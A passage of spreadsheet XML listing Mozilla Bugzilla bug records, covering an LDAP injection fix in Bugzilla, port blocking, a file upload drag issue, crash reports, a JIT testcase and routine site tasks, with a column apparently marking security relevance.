          <t>Bugzilla 3.6</t>
        </is>
      </c>
      <c r="T1063" t="n">
        <v>1</v>
      </c>
      <c r="U1063" t="n">
        <v>0</v>
      </c>
      <c r="V1063" t="n">
        <v>11</v>
      </c>
      <c r="W1063" t="inlineStr">
        <is>
          <t>When the user enters his credentials, no sanity check is done and his username is passed as is to create the filter which will be passed to $self-&gt;ldap-&gt;search(), see Bugzilla::Auth::Verify::LDAP::_bz_search_params(). This can lead to LDAP injection, as exploited successfully in bug 785112.
The username must be escaped, e.g. by using Net::LDAP::Util::escape_filter_value().
This problem exists since LDAP authentication has been implemented in Bugzilla 2.12, see bug 51185.</t>
        </is>
      </c>
      <c r="X1063" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1064">
      <c r="A1064" t="n">
        <v>914339</v>
      </c>
      <c r="B1064" t="inlineStr">
        <is>
          <t>2013-09-09 13:37:33 -0700</t>
        </is>
      </c>
      <c r="C1064" t="inlineStr">
        <is>
          <t>Update Logo on http://www.mozilla.org/en-US/products/download.html?product=firefox-stub&amp;os=win&amp;lang=en-US</t>
        </is>
      </c>
      <c r="D1064" t="inlineStr">
        <is>
          <t>2013-09-11 13:35:33 -0700</t>
        </is>
      </c>
      <c r="E1064" t="n">
        <v>1</v>
      </c>
      <c r="F1064" t="n">
        <v>1</v>
      </c>
      <c r="G1064" t="n">
        <v>5</v>
      </c>
      <c r="H1064" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I1064" t="inlineStr">
        <is>
          <t>www.mozilla.org</t>
        </is>
      </c>
      <c r="J1064" t="inlineStr">
        <is>
          <t>Legacy PHP system</t>
        </is>
      </c>
      <c r="K1064" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1064" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1064" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N1064" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1064" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1064" t="inlineStr">
        <is>
          <t>[kb=1112703]  r=119790</t>
        </is>
      </c>
      <c r="Q1064" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1064" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1064" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1064" t="n">
        <v>1</v>
      </c>
      <c r="U1064" t="n">
        <v>0</v>
      </c>
      <c r="V1064" t="n">
        <v>4</v>
      </c>
      <c r="W1064" t="inlineStr">
        <is>
          <t>STR:
Visit http://www.mozilla.org/en-US/products/download.html?product=firefox-stub&amp;os=win&amp;lang=en-US
notice  old logo on page.</t>
        </is>
      </c>
      <c r="X1064" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1065">
      <c r="A1065" t="n">
        <v>1677940</v>
      </c>
      <c r="B1065" t="inlineStr">
        <is>
          <t>2020-11-17 23:54:23 -0800</t>
        </is>
      </c>
      <c r="C1065" t="inlineStr">
        <is>
          <t>Consider blocking ports 69, 137, 161, 1719, 6566, 10080</t>
        </is>
      </c>
      <c r="D1065" t="inlineStr">
        <is>
          <t>2021-07-14 01:19:15 -0700</t>
        </is>
      </c>
      <c r="E1065" t="n">
        <v>1</v>
      </c>
      <c r="F1065" t="n">
        <v>1</v>
      </c>
      <c r="G1065" t="n">
        <v>3</v>
      </c>
      <c r="H1065" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1065" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1065" t="inlineStr">
        <is>
          <t>Networking</t>
        </is>
      </c>
      <c r="K1065" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1065" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1065" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1065" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1065" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1065" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main85+][adv-esr78.10+]</t>
        </is>
      </c>
      <c r="Q1065" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1065" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S1065" t="inlineStr">
        <is>
          <t>85 Branch</t>
        </is>
      </c>
      <c r="T1065" t="n">
        <v>1</v>
      </c>
      <c r="U1065" t="n">
        <v>0</v>
      </c>
      <c r="V1065" t="n">
        <v>18</v>
      </c>
      <c r="W1065" t="inlineStr">
        <is>
          <t>+++ This bug was initially created as a clone of Bug #1677047 +++
[Samy thinks that we should also block the ports for the following protocols](https://bugzilla.mozilla.org/show_bug.cgi?id=1677047#c12):
*    6566 SANE
*    10080 Amanda
*    69 TFTP
*    161 SNMP
*    1719 H323 (RAS)
*    137 NetBIOS</t>
        </is>
      </c>
      <c r="X1065" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1066">
      <c r="A1066" t="n">
        <v>206859</v>
      </c>
      <c r="B1066" t="inlineStr">
        <is>
          <t>2003-05-23 02:46:59 -0700</t>
        </is>
      </c>
      <c r="C1066" t="inlineStr">
        <is>
          <t>can drag text into file upload control</t>
        </is>
      </c>
      <c r="D1066" t="inlineStr">
        <is>
          <t>2023-06-20 21:50:33 -0700</t>
        </is>
      </c>
      <c r="E1066" t="n">
        <v>1</v>
      </c>
      <c r="F1066" t="n">
        <v>1</v>
      </c>
      <c r="G1066" t="n">
        <v>3</v>
      </c>
      <c r="H1066" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1066" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1066" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K1066" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1066" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1066" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1066" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1066" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1066" t="inlineStr"/>
      <c r="Q1066" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1066" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S1066" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1066" t="n">
        <v>1</v>
      </c>
      <c r="U1066" t="n">
        <v>0</v>
      </c>
      <c r="V1066" t="n">
        <v>23</v>
      </c>
      <c r="W1066" t="inlineStr">
        <is>
          <t>Mozilla allows dragging text into file upload controls.  See the testcase for
how this can be abused.
Suggested fix: allow dragging text into normal text fields but not into file
upload controls.  (This is what IE for Windows does.)
See also:
bug 50660 Should be able to drag FILES to the file upload control
bug 57770 Using styles, clipboard to confuse text entry into file upload control</t>
        </is>
      </c>
      <c r="X1066" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1067">
      <c r="A1067" t="n">
        <v>1419546</v>
      </c>
      <c r="B1067" t="inlineStr">
        <is>
          <t>2017-11-21 12:45:34 -0800</t>
        </is>
      </c>
      <c r="C1067" t="inlineStr">
        <is>
          <t>Crash in RetainedDisplayListBuilder::MergeDisplayLists</t>
        </is>
      </c>
      <c r="D1067" t="inlineStr">
        <is>
          <t>2018-01-04 18:32:28 -0800</t>
        </is>
      </c>
      <c r="E1067" t="n">
        <v>1</v>
      </c>
      <c r="F1067" t="n">
        <v>1</v>
      </c>
      <c r="G1067" t="n">
        <v>3</v>
      </c>
      <c r="H1067" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1067" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1067" t="inlineStr">
        <is>
          <t>Web Painting</t>
        </is>
      </c>
      <c r="K1067" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1067" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1067" t="inlineStr">
        <is>
          <t>Windows 10</t>
        </is>
      </c>
      <c r="N1067" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1067" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1067" t="inlineStr"/>
      <c r="Q1067" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1067" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1067" t="inlineStr">
        <is>
          <t>mozilla59</t>
        </is>
      </c>
      <c r="T1067" t="n">
        <v>1</v>
      </c>
      <c r="U1067" t="n">
        <v>0</v>
      </c>
      <c r="V1067" t="n">
        <v>13</v>
      </c>
      <c r="W1067" t="inlineStr">
        <is>
          <t>This bug was filed from the Socorro interface and is
report bp-b3cb89aa-ba20-40f6-86f9-8d0c20171118.
=============================================================
Seen while looking at nightly crash data: http://bit.ly/2zWeknf
Top 10 frames of crashing thread:
0 xul.dll RetainedDisplayListBuilder::MergeDisplayLists layout/painting/RetainedDisplayListBuilder.cpp:415
1 xul.dll RetainedDisplayListBuilder::MergeDisplayLists layout/painting/RetainedDisplayListBuilder.cpp:468
2 xul.dll RetainedDisplayListBuilder::AttemptPartialUpdate layout/painting/RetainedDisplayListBuilder.cpp:853
3 xul.dll nsLayoutUtils::PaintFrame layout/base/nsLayoutUtils.cpp:3827
4 xul.dll mozilla::PresShell::Paint layout/base/PresShell.cpp:6506
5 xul.dll nsViewManager::ProcessPendingUpdatesPaint view/nsViewManager.cpp:480
6 xul.dll nsViewManager::ProcessPendingUpdatesForView view/nsViewManager.cpp:412
7 xul.dll nsViewManager::ProcessPendingUpdates view/nsViewManager.cpp:1102
8 xul.dll nsRefreshDriver::Tick layout/base/nsRefreshDriver.cpp:2027
9 xul.dll mozilla::RefreshDriverTimer::TickDriver layout/base/nsRefreshDriver.cpp:336
=============================================================</t>
        </is>
      </c>
      <c r="X1067" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1068">
      <c r="A1068" t="n">
        <v>1170599</v>
      </c>
      <c r="B1068" t="inlineStr">
        <is>
          <t>2015-06-02 09:01:47 -0700</t>
        </is>
      </c>
      <c r="C1068" t="inlineStr">
        <is>
          <t>stackwalker can't rename tmp file to cache dir across filesystems</t>
        </is>
      </c>
      <c r="D1068" t="inlineStr">
        <is>
          <t>2015-06-08 11:00:04 -0700</t>
        </is>
      </c>
      <c r="E1068" t="n">
        <v>1</v>
      </c>
      <c r="F1068" t="n">
        <v>1</v>
      </c>
      <c r="G1068" t="n">
        <v>4</v>
      </c>
      <c r="H1068" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I1068" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J1068" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K1068" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1068" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1068" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1068" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1068" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1068" t="inlineStr"/>
      <c r="Q1068" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1068" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1068" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1068" t="n">
        <v>1</v>
      </c>
      <c r="U1068" t="n">
        <v>0</v>
      </c>
      <c r="V1068" t="n">
        <v>3</v>
      </c>
      <c r="W1068" t="inlineStr">
        <is>
          <t>If I mount a separate disk on e.g. /tmp/symbols, then stackwalker will fail to rename the file it downloaded to /tmp:
2015-06-02 16:00:29: http_symbol_supplier.cc:300: INFO: HTTPSymbolSupplier: failed to rename file, errno=18
Either the tempfile should be configurable, or perhaps this should fall back to copy-and-delete so "renaming" across filesystems works.</t>
        </is>
      </c>
      <c r="X1068" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1069">
      <c r="A1069" t="n">
        <v>1181211</v>
      </c>
      <c r="B1069" t="inlineStr">
        <is>
          <t>2015-07-07 10:24:10 -0700</t>
        </is>
      </c>
      <c r="C1069" t="inlineStr">
        <is>
          <t>Figure out how to update Balrog release blobs with multiple partials</t>
        </is>
      </c>
      <c r="D1069" t="inlineStr">
        <is>
          <t>2018-05-08 15:19:48 -0700</t>
        </is>
      </c>
      <c r="E1069" t="n">
        <v>1</v>
      </c>
      <c r="F1069" t="n">
        <v>1</v>
      </c>
      <c r="G1069" t="n">
        <v>5</v>
      </c>
      <c r="H1069" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I1069" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J1069" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K1069" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1069" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1069" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1069" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1069" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1069" t="inlineStr"/>
      <c r="Q1069" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R1069" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1069" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1069" t="n">
        <v>1</v>
      </c>
      <c r="U1069" t="n">
        <v>0</v>
      </c>
      <c r="V1069" t="n">
        <v>37</v>
      </c>
      <c r="W1069" t="inlineStr">
        <is>
          <t>ATM if you use multiple instances of the balrog client to update SingleLocale blobs, you end up overwriting the blob every time. Funsize can generate multiple partials in parallel, so we end up with a single random partial in the blob.
Instead of blindly submitting the update info, we can teach the client to read the blob and it's data_version, merge the update info with existing one and submit the result. If the submission fails (due to race condition guarded by data_version), the client should repeat the operation, starting from the "read the current data and data_version" step.
The logic is a bit more complicated for copying the info to the latest blob. Merging partials won't work, because the blob is not as clean as dated blobs - it contains old partials.
There are 2 options available so far for the latest blob:
1) after the dated blob is updated, "transplant" the data from the dated blob to the latest blob for a particular platform/locale combination:
  * read data_version of the latest blob
  * read the dated blob data
  * "transplant" the data to the latest blob using data_version
2) Validate partials whenever submit data to the latest blob. 
Both methods imply stop using of the copyTo parameter.</t>
        </is>
      </c>
      <c r="X1069" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1070">
      <c r="A1070" t="n">
        <v>571327</v>
      </c>
      <c r="B1070" t="inlineStr">
        <is>
          <t>2010-06-10 13:28:20 -0700</t>
        </is>
      </c>
      <c r="C1070" t="inlineStr">
        <is>
          <t>Download page not working for Chrome/Safari</t>
        </is>
      </c>
      <c r="D1070" t="inlineStr">
        <is>
          <t>2018-06-06 14:57:36 -0700</t>
        </is>
      </c>
      <c r="E1070" t="n">
        <v>1</v>
      </c>
      <c r="F1070" t="n">
        <v>1</v>
      </c>
      <c r="G1070" t="n">
        <v>6</v>
      </c>
      <c r="H1070" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I1070" t="inlineStr">
        <is>
          <t>www.mozilla.org Graveyard</t>
        </is>
      </c>
      <c r="J1070" t="inlineStr">
        <is>
          <t>Thunderbird</t>
        </is>
      </c>
      <c r="K1070" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1070" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1070" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N1070" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1070" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1070" t="inlineStr"/>
      <c r="Q1070" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1070" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1070" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1070" t="n">
        <v>1</v>
      </c>
      <c r="U1070" t="n">
        <v>0</v>
      </c>
      <c r="V1070" t="n">
        <v>6</v>
      </c>
      <c r="W1070" t="inlineStr">
        <is>
          <t>1. Search Google for "Thunderbird"
(what happens here is the link should be http://www.mozillamessaging.com/en-US/thunderbird/ and when they click on the download link we have parameters to point them to the proper download.  But the direct link to just /download/ provides three buttons one for Windows, Mac, Linux but properly provides the right version and language). 
2. click the "Download" sub-link in the top hit: goes to
http://www.mozillamessaging.com/en-US/thunderbird/download/
Problem: there is nothing on that page and no download is started.
Only for Chrome 5.0.375.55 on Mac 10.6.3 and Safari on Mac 4.0.5</t>
        </is>
      </c>
      <c r="X1070" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1071">
      <c r="A1071" t="n">
        <v>1182465</v>
      </c>
      <c r="B1071" t="inlineStr">
        <is>
          <t>2015-07-10 06:16:26 -0700</t>
        </is>
      </c>
      <c r="C1071" t="inlineStr">
        <is>
          <t>Remove substitution of 'engine' for 'InnoDB' in the template schema</t>
        </is>
      </c>
      <c r="D1071" t="inlineStr">
        <is>
          <t>2015-07-13 09:18:32 -0700</t>
        </is>
      </c>
      <c r="E1071" t="n">
        <v>1</v>
      </c>
      <c r="F1071" t="n">
        <v>1</v>
      </c>
      <c r="G1071" t="n">
        <v>7</v>
      </c>
      <c r="H1071" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I1071" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J1071" t="inlineStr">
        <is>
          <t>Treeherder</t>
        </is>
      </c>
      <c r="K1071" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L1071" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1071" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1071" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1071" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1071" t="inlineStr"/>
      <c r="Q1071" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R1071" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1071" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1071" t="n">
        <v>1</v>
      </c>
      <c r="U1071" t="n">
        <v>0</v>
      </c>
      <c r="V1071" t="n">
        <v>4</v>
      </c>
      <c r="W1071" t="inlineStr">
        <is>
          <t>Once bug 1182455 lands, we can stop the redundant substitution of 'engine' for
'InnoDB' in the template schema, given that engine is now always InnoDB
in create_db():
https://github.com/mozilla/treeherder/blob/9371347bc238dd4c83658fc363949a3c5dce86ff/treeherder/model/models.py#L335</t>
        </is>
      </c>
      <c r="X1071" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1072">
      <c r="A1072" t="n">
        <v>624202</v>
      </c>
      <c r="B1072" t="inlineStr">
        <is>
          <t>2011-01-08 17:52:10 -0800</t>
        </is>
      </c>
      <c r="C1072" t="inlineStr">
        <is>
          <t>Make sure to remove subscribers</t>
        </is>
      </c>
      <c r="D1072" t="inlineStr">
        <is>
          <t>2016-04-12 14:00:12 -0700</t>
        </is>
      </c>
      <c r="E1072" t="n">
        <v>1</v>
      </c>
      <c r="F1072" t="n">
        <v>1</v>
      </c>
      <c r="G1072" t="n">
        <v>6</v>
      </c>
      <c r="H1072" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I1072" t="inlineStr">
        <is>
          <t>Firefox Graveyard</t>
        </is>
      </c>
      <c r="J1072" t="inlineStr">
        <is>
          <t>Panorama</t>
        </is>
      </c>
      <c r="K1072" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1072" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1072" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1072" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1072" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1072" t="inlineStr">
        <is>
          <t>[qa-][cleanup][potential leak]</t>
        </is>
      </c>
      <c r="Q1072" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1072" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S1072" t="inlineStr">
        <is>
          <t>Firefox 4.0b12</t>
        </is>
      </c>
      <c r="T1072" t="n">
        <v>1</v>
      </c>
      <c r="U1072" t="n">
        <v>0</v>
      </c>
      <c r="V1072" t="n">
        <v>16</v>
      </c>
      <c r="W1072" t="inlineStr">
        <is>
          <t>We have, by my count, three places where we're adding subscribers and they don't remove themselves after being fired:
groupitems.js:
681         child.addSubscriber(self, "close", function() {
682           self.remove(child);
683         });
900         item.addSubscriber(this, "close", function() {
901           self.remove(item);
902         });
ui.js:
369       this._activeTab.addSubscriber(this, "close", function() {
370         self._activeTab = null;
371       });
In addition, I believe I've seen (on my leak hunt) other subscribers which, if they don't get fired, don't actually get removed... but that'll have to be a more systematic search and can be another bug. For starters, let's patch these three potential leaks.</t>
        </is>
      </c>
      <c r="X1072" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1073">
      <c r="A1073" t="n">
        <v>1312620</v>
      </c>
      <c r="B1073" t="inlineStr">
        <is>
          <t>2016-10-24 18:35:38 -0700</t>
        </is>
      </c>
      <c r="C1073" t="inlineStr">
        <is>
          <t>Differential Testing: Different output message involving zero</t>
        </is>
      </c>
      <c r="D1073" t="inlineStr">
        <is>
          <t>2016-12-15 10:48:55 -0800</t>
        </is>
      </c>
      <c r="E1073" t="n">
        <v>1</v>
      </c>
      <c r="F1073" t="n">
        <v>1</v>
      </c>
      <c r="G1073" t="n">
        <v>3</v>
      </c>
      <c r="H1073" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1073" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1073" t="inlineStr">
        <is>
          <t>JavaScript Engine: JIT</t>
        </is>
      </c>
      <c r="K1073" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1073" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M1073" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1073" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1073" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1073" t="inlineStr">
        <is>
          <t>[fuzzblocker]</t>
        </is>
      </c>
      <c r="Q1073" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1073" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S1073" t="inlineStr">
        <is>
          <t>mozilla52</t>
        </is>
      </c>
      <c r="T1073" t="n">
        <v>1</v>
      </c>
      <c r="U1073" t="n">
        <v>0</v>
      </c>
      <c r="V1073" t="n">
        <v>16</v>
      </c>
      <c r="W1073" t="inlineStr">
        <is>
          <t>function f(x) {
    return x || -0;
}
x = [0, 2147483648];
for (var j = 0; j &lt; 3; ++j) {
    for (var k = 0; k &lt; 2; ++k) {
        print(uneval(f(x[0], x[1])));
    }
}
$ ./js-dbg-64-dm-clang-darwin-215f96861176 --fuzzing-safe --no-threads --baseline-eager --no-ion testcase.js
-0
-0
-0
-0
-0
-0
$ ./js-dbg-64-dm-clang-darwin-215f96861176 --fuzzing-safe --no-threads --ion-eager testcase.js
-0
-0
-0
-0
0
0
Tested this on m-c rev 215f96861176.
My configure flags are:
CC="clang -Qunused-arguments" CXX="clang++ -Qunused-arguments" AR=ar AUTOCONF=/usr/local/Cellar/autoconf213/2.13/bin/autoconf213 sh /Users/skywalker/trees/mozilla-central/js/src/configure --target=x86_64-apple-darwin14.5.0 --disable-jemalloc --enable-debug --enable-more-deterministic --with-ccache --enable-gczeal --enable-debug-symbols --disable-tests
python -u ~/funfuzz/js/compileShell.py -b "--enable-debug --enable-more-deterministic" -r 215f96861176
autoBisect shows this is probably related to the following changeset:
The first bad revision is:
changeset:   https://hg.mozilla.org/mozilla-central/rev/01d621c2dbe3
user:        Johannes Schulte
date:        Fri Jun 24 19:02:23 2016 +0200
summary:     Bug 1176230 - Try to fold ternary's with double-argument to NaNToZero. r=nbp
Nicolas, is bug 1176230 a likely regressor?</t>
        </is>
      </c>
      <c r="X1073" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1074">
      <c r="A1074" t="n">
        <v>478038</v>
      </c>
      <c r="B1074" t="inlineStr">
        <is>
          <t>2009-02-11 10:22:23 -0800</t>
        </is>
      </c>
      <c r="C1074" t="inlineStr">
        <is>
          <t>Have secondary (arbitrary) zoom mechanism</t>
        </is>
      </c>
      <c r="D1074" t="inlineStr">
        <is>
          <t>2013-12-10 09:58:49 -0800</t>
        </is>
      </c>
      <c r="E1074" t="n">
        <v>1</v>
      </c>
      <c r="F1074" t="n">
        <v>1</v>
      </c>
      <c r="G1074" t="n">
        <v>6</v>
      </c>
      <c r="H1074" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I1074" t="inlineStr">
        <is>
          <t>Firefox for Android Graveyard</t>
        </is>
      </c>
      <c r="J1074" t="inlineStr">
        <is>
          <t>Panning/Zooming</t>
        </is>
      </c>
      <c r="K1074" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1074" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1074" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1074" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1074" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1074" t="inlineStr"/>
      <c r="Q1074" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1074" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1074" t="inlineStr">
        <is>
          <t>fennec1.0b5</t>
        </is>
      </c>
      <c r="T1074" t="n">
        <v>1</v>
      </c>
      <c r="U1074" t="n">
        <v>0</v>
      </c>
      <c r="V1074" t="n">
        <v>25</v>
      </c>
      <c r="W1074" t="inlineStr">
        <is>
          <t>Our primary zoom mechanism is double-tap to zoom, which is a structured zoom (zooms to the boundaries of the double-tapped-in area).  I've written a description of this and "arbitrary zoom" here:
https://wiki.mozilla.org/Mobile/UI/Designs/TouchScreen/workingUI#Zooming
that page outlines what I think we should do for arbitrary (free) zooming, given that we're designing for devices without multitouch (where pinch to zoom is the emerging convention).
We have to do this for a couple of reasons:
- structured zoom isn't always what the user is trying to do (e.g. zooming in and out within an image, for example)
- double-taps are used in a number of web-applications (e.g. gmail), so we have to provide some other way of zooming in or out when an area that makes use of double-tapping is all that's on the screen</t>
        </is>
      </c>
      <c r="X1074" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1075">
      <c r="A1075" t="n">
        <v>686107</v>
      </c>
      <c r="B1075" t="inlineStr">
        <is>
          <t>2011-09-10 03:10:49 -0700</t>
        </is>
      </c>
      <c r="C1075" t="inlineStr">
        <is>
          <t>Crash [@ JSC::MacroAssemblerCodePtr::executableAddress()]</t>
        </is>
      </c>
      <c r="D1075" t="inlineStr">
        <is>
          <t>2013-01-19 14:03:02 -0800</t>
        </is>
      </c>
      <c r="E1075" t="n">
        <v>1</v>
      </c>
      <c r="F1075" t="n">
        <v>1</v>
      </c>
      <c r="G1075" t="n">
        <v>3</v>
      </c>
      <c r="H1075" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1075" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1075" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K1075" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1075" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M1075" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N1075" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1075" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1075" t="inlineStr">
        <is>
          <t>[sg:critical?][qa-]</t>
        </is>
      </c>
      <c r="Q1075" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1075" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1075" t="inlineStr">
        <is>
